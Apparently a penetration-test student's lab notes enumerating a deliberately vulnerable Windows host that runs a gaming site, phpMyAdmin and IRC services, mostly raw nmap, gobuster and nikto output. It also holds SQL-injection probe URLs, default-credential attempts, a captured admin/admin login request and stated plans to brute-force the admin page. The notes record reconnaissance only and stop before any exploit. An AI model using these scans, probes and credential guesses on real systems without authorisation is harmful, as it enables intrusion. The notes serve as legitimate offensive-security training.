$ nmap -sV -sC -A -Pn 192.168.236.
44
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-01 08:01 EST
Nmap scan report for 192.168.236.44
Host is up (0.13s latency).
Not shown: 978 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp FileZilla ftpd
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
80/tcp open http Apache httpd 2.4.16 (OpenSSL/1.0.1p PHP/5.6.12)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.16 (Win32) OpenSSL/1.0.1p PHP/5.6.12
|_http-title: Index of /
443/tcp open ssl/http Apache httpd 2.4.16 (OpenSSL/1.0.1p PHP/5.6.12)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.16 (Win32) OpenSSL/1.0.1p PHP/5.6.12
|_http-title: Index of /
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
3306/tcp open mysql MySQL (unauthorized)
6666/tcp open irc InspIRCd
6667/tcp open irc InspIRCd
6668/tcp open irc InspIRCd
6669/tcp open irc InspIRCd
6689/tcp open irc InspIRCd
6692/tcp open irc InspIRCd
6699/tcp open irc InspIRCd
6779/tcp open irc InspIRCd
6788/tcp open irc InspIRCd
6789/tcp open irc InspIRCd
| irc-info:
| server: irc.madcowz.localdomain
| users: 3
| servers: 1
| chans: 1
| lusers: 3
| lservers: 0
| source ident: nmap
| source host: 192.168.49.236
|_ error: Closing link: (nmap@192.168.49.236) [Client exited]
6792/tcp open irc InspIRCd
6839/tcp open irc InspIRCd
| irc-info:
| server: irc.madcowz.localdomain
| users: 2
| servers: 1
| chans: 1
| lusers: 2
| lservers: 0
| source ident: nmap
| source host: 192.168.49.236
|_ error: Closing link: (nmap@192.168.49.236) [Client exited]
6881/tcp open irc InspIRCd
6901/tcp open irc InspIRCd
6969/tcp open irc InspIRCd
| irc-info:
| server: irc.madcowz.localdomain
| users: 4
| servers: 1
| chans: 1
| lusers: 4
| lservers: 0
| source ident: nmap
| source host: 192.168.49.236
|_ error: Closing link: (nmap@192.168.49.236) [Client exited]
7000/tcp open irc InspIRCd
7001/tcp open tcpwrapped
7007/tcp open irc InspIRCd
Service Info: Hosts: localhost, www.example.com, irc.madcowz.localdomain; OS:
Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.25 seconds
$ nmap -Pn -p- --script vuln 192.168.236.44
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-01 08:06 EST
Nmap scan report for 192.168.236.44
Host is up (0.11s latency).
Not shown: 65190 filtered ports
PORT STATE SERVICE
21/tcp open ftp
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
80/tcp open http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.236.44
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.236.44:80/public_html/
| Form id:
| Form action: /public_html/
|
| Path: http://192.168.236.44:80/public_html/index.php?
name=Your_Account&profile=kermit
| Form id:
| Form action: /public_html/index.php?name=Your_Account&profile=kermit
|
| Path: http://192.168.236.44:80/public_html/index.php?
name=Your_Account&profile=kermit
| Form id: ulogin2
|_ Form action: index.php?name=Your_Account
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /: Root directory w/ listing on 'apache/2.4.16 (win32) openssl/1.0.1p php/5.6.12'
| /phpmyadmin/: phpMyAdmin
|_ /icons/: Potentially interesting folder w/ directory listing
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-sql-injection:
| Possible sqli for queries:
| http://192.168.236.44:80/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=N%3bO%3dD%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=S%3bO%3dD%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=D%3bO%3dD%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=M%3bO%3dD%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=N%3bO%3dD%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.236.44:80/?C=D%3bO%3dA%27%20OR%20sqlspider
|_ http://192.168.236.44:80/?C=M%3bO%3dA%27%20OR%20sqlspider
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
443/tcp open https
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.236.44
| Found the following possible CSRF vulnerabilities:
|
| Path: https://192.168.236.44:443/public_html/
| Form id:
|_ Form action: /public_html/
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_ /: Root directory w/ listing on 'apache/2.4.16 (win32) openssl/1.0.1p php/5.6.12'
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
| ssl-dh-params:
| VULNERABLE:
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_AES_256_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: RFC2409/Oakley Group 2
| Modulus Length: 1024
| Generator Length: 8
| Public Key Length: 1024
| References:
|_ https://weakdh.org
|_sslv2-drown:
3306/tcp open mysql
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
6660/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6661/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6662/tcp open radmind
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6663/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6664/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| irc-botnet-channels:
|_ ERROR: Closing link: (unknown@192.168.49.236) [No more connections allowed from
your host via this connect class (local)]
6665/tcp open irc
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| irc-botnet-channels:
|_ ERROR: TIMEOUT
|_irc-unrealircd-backdoor: Server closed connection, possibly due to too many reconnects.
Try again with argument irc-unrealircd-backdoor.wait set to 100 (or higher if you get this
message again).
6666/tcp open irc
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| irc-botnet-channels:
|_ ERROR: Closing link: (unknown@192.168.49.236) [No more connections allowed from
your host via this connect class (local)]
|_irc-unrealircd-backdoor: Server closed connection, possibly due to too many reconnects.
Try again with argument irc-unrealircd-backdoor.wait set to 100 (or higher if you get this
message again).
6667/tcp open irc
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| irc-botnet-channels:
|_ ERROR: TIMEOUT
|_irc-unrealircd-backdoor: Server closed connection, possibly due to too many reconnects.
Try again with argument irc-unrealircd-backdoor.wait set to 100 (or higher if you get this
message again).
6668/tcp open irc
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| irc-botnet-channels:
|_ ERROR: Closing link: (unknown@192.168.49.236) [No more connections allowed from
your host via this connect class (local)]
6669/tcp open irc
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| irc-botnet-channels:
|_ ERROR: TIMEOUT
|_irc-unrealircd-backdoor: Server closed connection, possibly due to too many reconnects.
Try again with argument irc-unrealircd-backdoor.wait set to 100 (or higher if you get this
message again).
6670/tcp open irc
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| irc-botnet-channels:
|_ ERROR: Closing link: (unknown@192.168.49.236) [No more connections allowed from
your host via this connect class (local)]
6671/tcp open p4p-portal
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6672/tcp open vision_server
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6673/tcp open vision_elmd
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6674/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6675/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6676/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6677/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6678/tcp open vfbp
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6679/tcp open osaut
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| irc-botnet-channels:
|_ ERROR: Closing link: (unknown@192.168.49.236) [No more connections allowed from
your host via this connect class (local)]
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_sslv2-drown:
… (unknown)
6687/tcp open clever-ctrace
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6688/tcp open clever-tcpip
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6689/tcp open tsa
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6690/tcp open cleverdetect
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6691/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6692/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6693/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6694/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6695/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6696/tcp open babel
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6697/tcp open ircs-u
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| irc-botnet-channels:
|_ ERROR: Closing link: (unknown@192.168.49.236) [No more connections allowed from
your host via this connect class (local)]
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_sslv2-drown:
6698/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6699/tcp open napster
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6700/tcp open carracho
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6701/tcp open carracho
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6702/tcp open e-design-net
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6703/tcp open e-design-web
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
...
6714/tcp open ibprotocol
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6715/tcp open fibotrader-com
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6716/tcp open princity-agent
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
...
6767/tcp open bmc-perf-agent
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6768/tcp open bmc-perf-mgrd
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6769/tcp open adi-gxp-srvprt
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6770/tcp open plysrv-http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6771/tcp open plysrv-https
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
...
6777/tcp open ntz-tracker
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6778/tcp open ntz-p2p-storage
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
...
6784/tcp open bfd-lag
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6785/tcp open dgpf-exchg
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6786/tcp open smc-jmx
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6787/tcp open smc-admin
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6788/tcp open smc-http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6789/tcp open ibm-db2-admin
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6790/tcp open hnmp
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6791/tcp open hnm
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
...
6801/tcp open acnet
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
...
6817/tcp open pentbox-sim
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
...
6841/tcp open netmo-default
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
...
6850/tcp open iccrushmore
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
...
6868/tcp open acctopus-cc
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
...
6881/tcp open bittorrent-tracker
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
...
6888/tcp open muse
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
...
6900/tcp open rtimeviewer
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6901/tcp open jetstream
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
...
6935/tcp open ethoscan
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
...
6946/tcp open bioserver
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
...
6951/tcp open otlp
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
...
6961/tcp open jmact3
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6962/tcp open jmevt2
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6963/tcp open swismgr1
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6964/tcp open swismgr2
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6965/tcp open swistrap
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6966/tcp open swispol
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
...
6969/tcp open acmsoda
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6970/tcp open conductor
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
...
6997/tcp open MobilitySrv
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6998/tcp open iatp-highpri
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6999/tcp open iatp-normalpri
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
7000/tcp open afs3-fileserver
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| irc-botnet-channels:
|_ ERROR: TIMEOUT
|_irc-unrealircd-backdoor: Server closed connection, possibly due to too many reconnects.
Try again with argument irc-unrealircd-backdoor.wait set to 100 (or higher if you get this
message again).
7001/tcp open afs3-callback
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
7005/tcp open afs3-volser
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
7007/tcp open afs3-bos
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
Nmap done: 1 IP address (1 host up) scanned in 985.11 seconds
@ http://192.168.236.44/
@ http://192.168.236.44/public_html/
● MadCowz gaming site
● CPG Dragonfly CMS: Copyright (c) 2003-2020 by CPG-Nuke Development Team,
http://dragonflycms.org
● @ http://192.168.236.44/public_html/robots.txt
User-agent: Baidu
Disallow: /
User-agent: *alexa*
Disallow: /
User-agent: Googlebot-Image
Disallow: /
User-agent: Fasterfox
Disallow: /
User-agent: *
Crawl-delay: 20
Disallow: /admin.php
Disallow: /error.php
Disallow: /admin/
Disallow: /blocks/
Disallow: /cache/
Disallow: /images/
Disallow: /includes/
Disallow: /language/
Disallow: /modules/
Disallow: /themes/
// Nothing here
$ gobuster dir -u 192.168.242.44 -w /usr/share/wordlists/dirbuster/directory-list-2.3-
medium.txt -t 4 -q -x html,txt,php
/security (Status: 403)
/security.html (Status: 403)
/security.txt (Status: 403)
/security.php (Status: 403)
/Security (Status: 403)
/Security.php (Status: 403)
/Security.html (Status: 403)
/Security.txt (Status: 403)
/licenses (Status: 403)
/licenses.txt (Status: 403)
/licenses.php (Status: 403)
/licenses.html (Status: 403)
^C
$ nikto -h 192.168.236.44
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.236.44
+ Target Hostname: 192.168.236.44
+ Target Port: 80
+ Start Time: 2020-11-01 08:01:39 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.16 (Win32) OpenSSL/1.0.1p PHP/5.6.12
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to
protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render
the content of the site in a different fashion to the MIME type
+ OSVDB-3268: /: Directory indexing found.
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily
brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The
following alternatives for 'index' were found: HTTP_NOT_FOUND.html.var,
HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var,
HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var,
HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var,
HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var,
HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var,
HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var,
HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var,
HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var,
HTTP_NOT_FOUND.html.var
+ OpenSSL/1.0.1p appears to be outdated (current is at least 1.1.1). OpenSSL 1.0.0o and
0.9.8zc are also current.
+ Apache/2.4.16 appears to be outdated (current is at least Apache/2.4.37). Apache
2.2.34 is the EOL for the 2.x branch.
+ PHP/5.6.12 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27,
7.1.13, 7.2.1 may also current release for each branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /./: Directory indexing found.
+ /./: Appending '/./' to a directory allows indexing
+ OSVDB-3268: //: Directory indexing found.
+ //: Apache on Red Hat Linux release 9 reveals the root directory listing by default if there
is no index page.
+ OSVDB-3268: /%2e/: Directory indexing found.
+ OSVDB-576: /%2e/: Weblogic allows source code or directory listing, upgrade to v6.0
SP1 or higher. http://www.securityfocus.com/bid/2513.
+ OSVDB-3268: ///: Directory indexing found.
+ OSVDB-119: /?PageServices: The remote server may allow directory listings through
Web Publisher by forcing the server to show all files via 'open directory browsing'. Web
Publisher should be disabled. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-
0269.
+ OSVDB-119: /?wp-cs-dump: The remote server may allow directory listings through Web
Publisher by forcing the server to show all files via 'open directory browsing'. Web
Publisher should be disabled. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-
0269.
+ Retrieved x-powered-by header: PHP/5.6.12
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3092: /phpmyadmin/ChangeLog: phpMyAdmin is for managing MySQL
databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-
3268: //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////: Directory
indexing found.
+ OSVDB-
3288: //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////: Abyss 1.03
reveals directory listing when /'s are requested.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpmyadmin/README: phpMyAdmin is for managing MySQL
databases, and should be protected or limited to authorized hosts.
+ 8726 requests: 0 error(s) and 28 item(s) reported on remote host
+ End Time: 2020-11-01 08:19:44 (GMT-5) (1085 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
$ gobuster dir -u http://192.168.236.44/public_html/ -w
/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php -t 4 -q
/index.php (Status: 200)
/images (Status: 301)
/news.html (Status: 200)
/contact.html (Status: 200)
/search.html (Status: 200)
/rss (Status: 301)
/banners.php (Status: 302)
/themes (Status: 301)
/modules (Status: 301)
/uploads (Status: 301)
/header.php (Status: 200)
/Images (Status: 301)
/News.html (Status: 200)
/admin (Status: 403)
/admin.php (Status: 200)
/privacy_policy.html (Status: 200)
/footer.php (Status: 200)
/gfx.html (Status: 200)
/smilies.html (Status: 200)
/Search.html (Status: 200)
/Contact.html (Status: 200)
/credits.html (Status: 200)
/includes (Status: 301)
/Index.php (Status: 200)
/language (Status: 403)
/statistics.html (Status: 200)
/RSS (Status: 301)
/cache (Status: 403)
/blocks (Status: 403)
/Themes (Status: 301)
/config.php (Status: 403)
/NEWS.html (Status: 200)
/robots.txt (Status: 200)
/surveys.html (Status: 200)
/error.php (Status: 200)
/Banners.php (Status: 302)
/IMAGES (Status: 301)
/%20 (Status: 403)
/Rss (Status: 301)
/Header.php (Status: 200)
/INDEX.php (Status: 200)
/Language (Status: 403)
/Modules (Status: 301)
/Admin (Status: 403)
/Admin.php (Status: 200)
/*checkout* (Status: 403)
/*checkout*.html (Status: 403)
/*checkout*.txt (Status: 403)
/*checkout*.php (Status: 403)
/Statistics.html (Status: 200)
/Privacy_Policy.html (Status: 200)
/coppermine.html (Status: 200)
/Uploads (Status: 301)
/CREDITS.html (Status: 200)
/Surveys.html (Status: 200)
/*docroot* (Status: 403)
/*docroot*.html (Status: 403)
/*docroot*.txt (Status: 403)
/*docroot*.php (Status: 403)
/Config.php (Status: 403)
/Footer.php (Status: 200)
/* (Status: 403)
/*.txt (Status: 403)
/*.php (Status: 403)
/*.html (Status: 403)
/con (Status: 403)
/con.html (Status: 403)
/con.txt (Status: 403)
/con.php (Status: 403)
/SEARCH.html (Status: 200)
/CONTACT.html (Status: 200)
/Cache (Status: 403)
/Credits.html (Status: 200)
/Your_Account.html (Status: 200)
/Robots.txt (Status: 200)
/Error.php (Status: 200)
/http%3A (Status: 403)
/http%3A.html (Status: 403)
/http%3A.txt (Status: 403)
/http%3A.php (Status: 403)
/Includes (Status: 301)
/Smilies.html (Status: 200)
/**http%3a (Status: 403)
/**http%3a.html (Status: 403)
/**http%3a.txt (Status: 403)
/**http%3a.php (Status: 403)
/*http%3A (Status: 403)
/*http%3A.html (Status: 403)
/*http%3A.txt (Status: 403)
/*http%3A.php (Status: 403)
/aux (Status: 403)
/aux.html (Status: 403)
/aux.txt (Status: 403)
/aux.php (Status: 403)
/your_account.html (Status: 200)
/**http%3A (Status: 403)
/**http%3A.html (Status: 403)
/**http%3A.txt (Status: 403)
/**http%3A.php (Status: 403)
/Private_Messages.html (Status: 401)
/%C0 (Status: 403)
/%C0.html (Status: 403)
/%C0.txt (Status: 403)
/%C0.php (Status: 403)
/sr%3D8-1.html (Status: 200)
…
@ http://192.168.236.44/public_html/index.php?name=News&file=article&sid=1
We have our first match next Friday night against Cookie Monsters, so beloved daisy has
setup a practice server for user to get back into the swing of things.
Join IRC and Mumble to get more information.
● Posted by Fluffy on Saturday, October 03, 2015
○ Users: fluffy, kermit, daisy
@ http://192.168.236.44/public_html/index.php?name=Your_Account
● Try default creds but failed -> ERROR: “Our records do not indicate an existing
user named admin”
// Register a new user but need to confirm via email :(
@ http://192.168.236.44/public_html/admin.php
@ http://192.168.236.44/public_html/uploads/
// Searchsploit dragonfly
- CPGNuke Dragonfly 9.0.6.1 - Remote Command Execution |
php/webapps/1478.php [FAILED, don’t understand the exploit]
- Dragonfly Commerce 1.0 - Multiple SQL Injections |
asp/webapps/25963.txt [FAILED]
@ http://192.168.236.44/phpmyadmin/
● Try default creds -> don’t work
● Version 4.4.14
● @ http://192.168.236.44/phpmyadmin//Changelog
@ https://192.168.236.44:443/ -> @ https://192.168.236.44/
$ gobuster dir -u 192.168.236.44/phpmyadmin/ -w
/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 4 -x php,html,txt -q
/index.php (Status: 200)
/themes (Status: 301)
/themes.php (Status: 200)
/doc (Status: 301)
/webapp.php (Status: 200)
/Index.php (Status: 200)
/license (Status: 200)
/license.php (Status: 200)
/navigation.php (Status: 200)
/README (Status: 200)
/examples (Status: 301)
/js (Status: 301)
/libraries (Status: 301)
/changelog (Status: 200)
/changelog.php (Status: 200)
/url.php (Status: 302)
/export.php (Status: 200)
/ChangeLog (Status: 200)
/ChangeLog.php (Status: 200)
/Themes (Status: 301)
/Themes.php (Status: 200)
/readme (Status: 200)
/robots.txt (Status: 200)
/setup (Status: 301)
/sql (Status: 301)
/sql.php (Status: 200)
/LICENSE (Status: 200)
/LICENSE.php (Status: 200)
/%20 (Status: 403)
/Libraries (Status: 301)
/INDEX.php (Status: 200)
/License (Status: 200)
/License.php (Status: 200)
/SQL (Status: 301)
/SQL.php (Status: 200)
/locale (Status: 301)
/*checkout* (Status: 403)
/*checkout*.php (Status: 403)
/*checkout*.html (Status: 403)
/*checkout*.txt (Status: 403)
/import.php (Status: 200)
/Navigation.php (Status: 200)
/CHANGELOG (Status: 200)
/CHANGELOG.php (Status: 200)
/Changelog (Status: 200)
/Changelog.php (Status: 200)
/Doc (Status: 301)
/JS (Status: 301)
/dco (Status: 200)
/URL.php (Status: 302)
/Examples (Status: 301)
/Setup (Status: 301)
/*docroot* (Status: 403)
/*docroot*.php (Status: 403)
/*docroot*.html (Status: 403)
/*docroot*.txt (Status: 403)
/* (Status: 403)
/*.html (Status: 403)
/*.txt (Status: 403)
/*.php (Status: 403)
/con (Status: 403)
/con.php (Status: 403)
/con.html (Status: 403)
/con.txt (Status: 403)
/Robots.txt (Status: 200)
/ReadMe (Status: 200)
/Locale (Status: 301)
/DOC (Status: 301)
/Readme (Status: 200)
/**http%3a (Status: 403)
/**http%3a.php (Status: 403)
/**http%3a.html (Status: 403)
/**http%3a.txt (Status: 403)
/*http%3A (Status: 403)
/*http%3A.php (Status: 403)
/*http%3A.html (Status: 403)
/*http%3A.txt (Status: 403)
/aux (Status: 403)
/aux.php (Status: 403)
/aux.html (Status: 403)
/aux.txt (Status: 403)
/**http%3A (Status: 403)
/**http%3A.php (Status: 403)
/**http%3A.html (Status: 403)
/**http%3A.txt (Status: 403)
/server_status.php (Status: 200)
/DB_Search.php (Status: 200)
/phpinfo.php (Status: 200)
...
FTP: failed to connect as anonymous (MadCowz FTP)
// BurpSuite request to login on @ http://192.168.236.44/public_html/admin.php (but don’t
know how to bruteforce with Hydra)
POST /public_html/admin.php HTTP/1.1
Host: 192.168.236.44
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.236.44/public_html/admin.php
Content-Type: multipart/form-data; boundary=---------------------------
17914201875003999151636418193
Content-Length: 291
Connection: close
Cookie: CMSSESSID=vveo6lp591nen3gg8pgqu0lsk0;
cpg_data=YToxOntzOjI6IklEIjtzOjI2OiJ2dmVvNmxwNTkxbmVuM2dnOHBncXUwbHNrMCI
7fQ%3D%3D
Upgrade-Insecure-Requests: 1
-----------------------------17914201875003999151636418193
Content-Disposition: form-data; name="alogin"
admin
-----------------------------17914201875003999151636418193
Content-Disposition: form-data; name="pwd"
admin
-----------------------------17914201875003999151636418193--
// Install hexchat to connect to IRC server
$ sudo apt-get install hexchat
$ hexchat
// Click “+Add” to add a new server -> Create “UT99”
// Click “Edit” to update this server
// Modify as follows:
● Server: 192.168.68.44/6789
